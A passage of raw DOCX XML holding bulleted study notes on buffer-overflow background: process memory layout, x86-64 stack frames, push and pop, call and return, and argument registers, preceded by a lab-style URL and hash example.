          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="000C398E">
        <w:t>http://10.10.181.63:3010 'sha256-msFFk2PJ3th+BLkXCEmbzm944IJKWP3bxeY70tH2eLY='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CABDE" w14:textId="29DD1C31" w:rsidR="000C398E" w:rsidRDefault="000C398E" w:rsidP="000C398E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082A733C" w14:textId="3D6D587F" w:rsidR="000C398E" w:rsidRDefault="00EF724C" w:rsidP="000C398E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8C4EC" w14:textId="085B68CB" w:rsidR="00EF724C" w:rsidRDefault="00EF724C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B686D5C" w14:textId="6F897412" w:rsidR="00EF724C" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Process Layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB675F6" w14:textId="35B095BC" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when a program runs on the machine, computer runs the program as a process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526D13CE" w14:textId="6C525243" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>multiple processes can be run concurrently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AD046" w14:textId="7323CEFC" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>in reality they are switched between rapidly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC88F7C" w14:textId="4FF29606" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>context switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287237A7" w14:textId="5500D062" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>information needed to run each process in stored and organized sequentially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B471DDD" w14:textId="5DA8AF40" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User Stack &gt; Shared Library Regions &gt; Run Time Heap &gt; Read/Write Data &gt; Read Only Code/Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B581E17" w14:textId="49A3E798" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>user stack contains information required to run a program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF886AA" w14:textId="58E26576" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>includes current program counter, saved registers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B5822" w14:textId="39454DC1" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>section following stack is unused memory, in case stack grows downwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C4B9C9" w14:textId="524119A5" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shared library regions are used to either statically or dynamically link libraries that are used by the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681A676" w14:textId="3D9D4FEE" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>heap increases and decreases dynamically depending on whether a program dynamically assigns memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57104336" w14:textId="48CCE11E" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>section above heap is unassigned in the event the size of the heap increases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E527B8" w14:textId="7F29D5C7" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>program code and data stores the program executable and initialized variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C35F43A" w14:textId="01CA29C2" w:rsidR="00BE4AD6" w:rsidRDefault="00BE4AD6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>x86-64 Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B09CDE" w14:textId="7A72FF6A" w:rsidR="00BE4AD6" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>a program would usually comprise of multiple functions with a way of tracking which function has been called and what data is passed from one function to another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BD8304" w14:textId="003AA3AF" w:rsidR="00CB4A5B" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stack is a region of contiguous memory addresses used to make transfer control and data between functions easier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A62878" w14:textId="2D7DF57F" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stack grows lower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F260A17" w14:textId="2DC03D6C" w:rsidR="00CB4A5B" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>top of the stack is at the lowest memory address and the stack grows towards lower memory addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43013046" w14:textId="6915BA32" w:rsidR="00CB4A5B" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">stack bottom is at higher memory address, stack top is at lower memory address </w:t>
      </w:r>
      <w:r w:rsidR="00C001ED">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C001ED">
        <w:t>rsp points here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A15FFB4" w14:textId="71E8BE74" w:rsidR="00CB4A5B" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>most common operations are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF4E92" w14:textId="2F827778" w:rsidR="00CB4A5B" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pushing – add data onto stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E008C" w14:textId="027B0720" w:rsidR="00CB4A5B" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>popping – remove data from stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD0B4D" w14:textId="36613F68" w:rsidR="00CB4A5B" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>push var – assembly instruction to push a value onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA56BE" w14:textId="01950CD9" w:rsidR="00CB4A5B" w:rsidRDefault="00CB4A5B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uses var or value stored in memory location of var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A9DE6" w14:textId="5CB6C7F6" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pop var – assembly instruction to read a value and pop it off the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2215FC" w14:textId="0EF19D21" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reads value at the address given by the stack pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6625B581" w14:textId="043695D3" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>memory does not change when popping values off the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E62F2" w14:textId="50A89587" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>only the value of the stack pointer that changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D4970" w14:textId="29F5D0DE" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>each compiled program contains multiple functions, with each function storing local variables, arguments, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A90D1" w14:textId="5FAEA804" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>each function has its own separate stack frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7086FB" w14:textId="60747DD1" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>each new stack frame is allocated when a function is called, and deallocated when the function is complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700BB2A9" w14:textId="7D6AF033" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stack bottom – stack frame one – stack frame two – stack frame three – stack top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DE298" w14:textId="6E481F8C" w:rsidR="00C001ED" w:rsidRDefault="00C001ED" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Procedures Continued</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF26C2" w14:textId="45B20355" w:rsidR="00C001ED" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Assumption that current point of execution is inside calc function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936B25D" w14:textId="0961756B" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>calc is the caller function and add is the callee function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE22D62" w14:textId="654CA2D8" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stack bottom – previous stack frame – stack frame for function calc – stack top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4810244A" w14:textId="435F20CC" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>add function invoked with call operand in assembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A04FB" w14:textId="5E5D36A0" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>callq sym.add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39058585" w14:textId="5A11A895" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>takes label as an argument (function name) or memory address as an offset to the location of the start of the function in the form of call *value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ABFCE9" w14:textId="77777777" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">once function is invoked, computer pushes address of next instruction onto the stack, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E893BE" w14:textId="77777777" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">then allocate a stack frame for the new function, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7178E2AF" w14:textId="77777777" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">change the current pointer to the first instruction in the function, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE66A99" w14:textId="77777777" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">change the pointer(rsp) to the top of the stack, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D300C" w14:textId="6E9431AB" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>and change the frame pointer(rbp) to point to the start of the new frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46424EE7" w14:textId="3914EA2B" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stack bottom – previous stack frame – stack frame for Calc – return address – stack frame for add – stack top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726851E1" w14:textId="1180ADE1" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>once function is finished executing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109B486A" w14:textId="79422924" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>call return instruction(retq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3146C1" w14:textId="7DDD8FE5" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pop value of return address of stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E63782" w14:textId="54B34B7F" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>deallocate the stack frame for the function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D641E46" w14:textId="20619AFF" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change instruction pointer to value of return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83F776" w14:textId="781DEFD9" w:rsidR="00D0713D" w:rsidRDefault="00D0713D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change stack point (rsp) to top of stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F875962" w14:textId="50726157" w:rsidR="00D0713D" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change frame point (rbp) to stack frame of calc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0D301B" w14:textId="3FDFF76E" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>stack bottom – previous stack frame – stack frame for calc – stack top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E241287" w14:textId="75B0EF82" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>up to six arguments for functions can be stored in following registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE14118" w14:textId="1169FB7B" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rdi, rsi, rdx, rcx, r8, r9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E15B20" w14:textId="06A8414D" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rax stores return values of the functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDDD068" w14:textId="047FCFAE" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if function has more arguments, those would be stored on functions stack frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364EF6D7" w14:textId="558F7C9D" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
